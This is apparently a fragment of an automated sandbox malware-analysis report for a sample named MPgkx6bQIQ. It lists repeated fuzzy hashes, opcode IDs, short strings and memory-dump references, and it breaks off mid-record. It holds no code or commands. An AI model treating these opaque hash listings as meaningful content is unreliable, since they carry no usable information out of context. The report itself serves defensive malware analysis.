                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                                                                                                          • API String ID: 0-1993550816
                                                                                                                                                                                                                                                                                          • Opcode ID: 63a83f5a27331d9fe3a04257bda5fcaf30bc217a6dc898aca3077588f1bd9e28
                                                                                                                                                                                                                                                                                          • Instruction ID: fd76e4508406a8fdf5ee9760a4cce4852087ffa567f57879faa4c9efc23ed29f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63a83f5a27331d9fe3a04257bda5fcaf30bc217a6dc898aca3077588f1bd9e28
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B22E1756083518FD719CF25C880B6BBBE2BFC9314F188A2EE59587391DB70D806CB62
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
• API ID: InitializeThunk
• String ID: f
• API String ID: 2994545307-1993550816
• Opcode ID: 5a2b71fe6b7abe8913033312b3adb200dd37ce9910002ae41400eab354b8cdfc
• Instruction ID: c6061003a35e321c419c30bd02a3c4e1c0b56f4f8cbc670ef9e4360bbe252bef
• Opcode Fuzzy Hash: 5a2b71fe6b7abe8913033312b3adb200dd37ce9910002ae41400eab354b8cdfc
• Instruction Fuzzy Hash: 7722EF756083518FD718CF25C880A2BBBE2BBC9314F199A2DE4D587391DBB4EC06CB46
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: A67H
• API String ID: 0-3389657328
• Opcode ID: 025ab6247b28a9282489cbf8863c1f11cc422bce5e661f3cde5867652b65232c
• Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
• Opcode Fuzzy Hash: 025ab6247b28a9282489cbf8863c1f11cc422bce5e661f3cde5867652b65232c
• Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: [
• API String ID: 0-3878419350
• Opcode ID: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
• Instruction ID: fa7c806fdbc4176f12455e09202549721930326aa32a2ff69709370a49a8f25c
• Opcode Fuzzy Hash: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
• Instruction Fuzzy Hash: D0021075600702CBCB34CF29C8D1667BBF2FF9A314B19859DC4864BBA5EB39A412CB50
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,)*k
• API String ID: 0-1228391949
• Opcode ID: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
• Instruction ID: 449372fe72bdc05897a95865896d0a563ed0b6f0f380e8c7e837a40e0ad4d11f
• Opcode Fuzzy Hash: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
• Instruction Fuzzy Hash: 55C15876A083504BD716DF21C880AAFFBE6AFC6704F19892EE68557790D7319841CBB2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: ,)*k
• API String ID: 2994545307-1228391949
• Opcode ID: 3abeb72b50cbf0ea3c5cb2ec33269c319db1e6da438ada41a467feb5054111f7
• Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
• Opcode Fuzzy Hash: 3abeb72b50cbf0ea3c5cb2ec33269c319db1e6da438ada41a467feb5054111f7
• Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: m
• API String ID: 0-3775001192
• Opcode ID: 6ef6d805ebeae707db88c870f1bf3431cf214446e2165707fa793f0aed11e90b
• Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
• Opcode Fuzzy Hash: 6ef6d805ebeae707db88c870f1bf3431cf214446e2165707fa793f0aed11e90b
• Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: 167H
• API String ID: 0-2704650348
• Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
• Instruction ID: 471544097740ab14813bcf70aa3c5efef477192c08753e7980c08d360f4fb475
• Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
• Instruction Fuzzy Hash: F4D18972A093444BD714CF288CA17ABB792EFE5314F59862EE985873C1D735D906CB81
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: .
• API String ID: 0-1505114982
• Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
• Instruction ID: 749b7616d8414959277a48cdb97a749364f26450334e55306b5d6e3cf411a9a5
• Opcode Fuzzy Hash: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
• Instruction Fuzzy Hash: 47C1F8B5D006118BCF24CF29C8917BBBBB1FF89314F19825ED895AB790E734A941CB90
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                          • String ID: 167H
                                                                                                                                                                                                                                                                                          • API String ID: 2994545307-2704650348
                                                                                                                                                                                                                                                                                          • Opcode ID: 47f0214db84f49b5bfad94cac133fa0217f1a5aa21233c84e6ce32df6523bf1a
                                                                                                                                                                                                                                                                                          • Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47f0214db84f49b5bfad94cac133fa0217f1a5aa21233c84e6ce32df6523bf1a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                                                                          • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                                          • Opcode ID: 058d6976c154ba544523462971709c9beecc9be599d953173e0a21b130673455
                                                                                                                                                                                                                                                                                          • Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 058d6976c154ba544523462971709c9beecc9be599d953173e0a21b130673455
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                                                                                          • API String ID: 0-2852464175
                                                                                                                                                                                                                                                                                          • Opcode ID: f90cc14d5b1d07471296a569d27c41b333f7458cf0fcf530a90d726fe5722012
                                                                                                                                                                                                                                                                                          • Instruction ID: 0c29c4f326a3360d4f83cd19facfb249d1e6e8dcfa8d7f8eb9091c930c4cf0c7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f90cc14d5b1d07471296a569d27c41b333f7458cf0fcf530a90d726fe5722012
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69D17634B05254CFDB14CF78E8D16AEBBB2AF1A310F6841BDE5519B392CB384906CB59
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &#
                                                                                                                                                                                                                                                                                          • API String ID: 0-1789715784
                                                                                                                                                                                                                                                                                          • Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                                                          • Instruction ID: 380cf20ea5d2411fe0cf3851994aea14201550f8249a442476bdf97d01bf174f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7BA17BB26082105BD715DB28CCA277BB3E1EFA1324F09852EED969B3C0E3B4D905D752
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &#
                                                                                                                                                                                                                                                                                          • API String ID: 0-1789715784
                                                                                                                                                                                                                                                                                          • Opcode ID: de53aefd5a1aa7a3c6e7ceeff6aeff0c51e7fefa1ef74132f5b7c443d7941a72
                                                                                                                                                                                                                                                                                          • Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de53aefd5a1aa7a3c6e7ceeff6aeff0c51e7fefa1ef74132f5b7c443d7941a72
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                                                                          • API String ID: 0-1505114982
• Opcode ID: 25aa824990e0b099dbedb7f342dca715901da659ff19adf71e826704a6bc8dca
• Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
• Opcode Fuzzy Hash: 25aa824990e0b099dbedb7f342dca715901da659ff19adf71e826704a6bc8dca
• Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: -
• API String ID: 0-2547889144
• Opcode ID: 27c89adea84a4971459812ff31a4728146f694fcb44008b8af47e8cd9ff8a59b
• Instruction ID: ae89ce379813568deb0bbb84b14992f19032d2708220660c784847ba3a350cec
• Opcode Fuzzy Hash: 27c89adea84a4971459812ff31a4728146f694fcb44008b8af47e8cd9ff8a59b
• Instruction Fuzzy Hash: 07D10C31A187494BC718EE29C89026FBBE3EFC1624F588A2EE4E5173D5D7389945CB81
Strings
• 7605F6E83C1F4941F9F1B7136A1E0C5E, xrefs: 004097D3
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: 7605F6E83C1F4941F9F1B7136A1E0C5E
• API String ID: 0-1898908162
• Opcode ID: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
• Instruction ID: 2e87a28a76dba4f31cae47dba0fb7e22e1a8f98f0dc0d4366023ba0889080103
• Opcode Fuzzy Hash: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
• Instruction Fuzzy Hash: 35C105716083808BD318DF35C85066BBBE6EBD2314F14893DE4D697392DB39C90ACB56
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: de
• API String ID: 0-2106599819
• Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
• Instruction ID: 3c9150d9ff40b1b37d16856c17321ed8f55643978e51e74a7a13a5c4cb7861a5
• Opcode Fuzzy Hash: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
• Instruction Fuzzy Hash: 4E9132719083118BC724DF28C8D276BBBF2EF99324F18992EE4D64B391E7798505C792
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: ~
• API String ID: 0-1707062198
• Opcode ID: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
• Instruction ID: 06779590fa8c69f09aefe10d0ff5973972e3a51979e18899104f063af5ed9aaf
• Opcode Fuzzy Hash: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
• Instruction Fuzzy Hash: 8EA12976E046619FCB15CE28CC8066BBBE1AF85324F19867EECA997391D7318C06C791
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: ~
• API String ID: 0-1707062198
• Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
• Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
• Opcode Fuzzy Hash: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
• Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: RpB
• API String ID: 0-664042118
• Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
• Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
• Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
• Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: d1
• API String ID: 0-4211392460
• Opcode ID: 3a09c18315f27601645beb0ad486dee07da92b92439b4458714023d4f5bac47a
• Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
• Opcode Fuzzy Hash: 3a09c18315f27601645beb0ad486dee07da92b92439b4458714023d4f5bac47a
• Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A
Strings
Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: cdef
                                                                                                                                                                                                                                                                                          • API String ID: 0-4216504194
                                                                                                                                                                                                                                                                                          • Opcode ID: 6cfb0631b4c3af94e0a4d7ca533938db559d7b6d0bfe02f92feebc81ba876585
                                                                                                                                                                                                                                                                                          • Instruction ID: 572ca5d0947c520602ad4aba03d7ce4505958a586629e3af2f8388d03d5464aa
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cfb0631b4c3af94e0a4d7ca533938db559d7b6d0bfe02f92feebc81ba876585
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94814871A08350CFC726CF14C890AABBBA1EFD6714F28896DD9D557395D731A801CBA2
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                          • String ID: cdef
                                                                                                                                                                                                                                                                                          • API String ID: 2994545307-4216504194
                                                                                                                                                                                                                                                                                          • Opcode ID: 6bc07d34d1d6b00cc4b19fb39e7543bc3ba7a18e64985db278588bca8b02e99b
                                                                                                                                                                                                                                                                                          • Instruction ID: d704160fc5b89d86d9794d8a66ae716d782a0973953182dc9c1641cf0cee7e05
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bc07d34d1d6b00cc4b19fb39e7543bc3ba7a18e64985db278588bca8b02e99b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30815471A083108FC718DF24E88096BBBA2EFDA310F19993DE9D557352C735AC05C786
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: gfff
                                                                                                                                                                                                                                                                                          • API String ID: 0-1553575800
                                                                                                                                                                                                                                                                                          • Opcode ID: c5d9ff75fed77c201b8d14b3cc3b758706ca82fef0a51ed8aa8899dc59fb4eb5
                                                                                                                                                                                                                                                                                          • Instruction ID: b72094360f49f593122c80eda49c80655e3dd75c4d2e22d7dcdaa45787506178
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5d9ff75fed77c201b8d14b3cc3b758706ca82fef0a51ed8aa8899dc59fb4eb5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C91E4B16507428FD724CF39C850BA6BBD2EB86314F18C57EC596CB796EB78A442C740
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: c$
                                                                                                                                                                                                                                                                                          • API String ID: 0-2516980088
                                                                                                                                                                                                                                                                                          • Opcode ID: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                                                          • Instruction ID: 1b5f3761f8c1b73a5bb898a2eb0581f8d149aa154b083609e48ed751defe9bdb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 349179B01117418FEB64CF25C8A0B63BBB2FF46318F159589C4864FBA1E379A846CB94
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: Fg
                                                                                                                                                                                                                                                                                          • API String ID: 0-875302535
                                                                                                                                                                                                                                                                                          • Opcode ID: 42a71ed4ddc16415858e4dfc4422956aad04ddc95995e0a2601de5add053e1e2
                                                                                                                                                                                                                                                                                          • Instruction ID: 6364b440988ee8a53e54544f774f6c722a4190974d959617f58207090a1b733b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42a71ed4ddc16415858e4dfc4422956aad04ddc95995e0a2601de5add053e1e2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1581987161D3808AD7698F25C8657FBBBD3EBE2308F18996DC1D987392DB35400ACB16
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
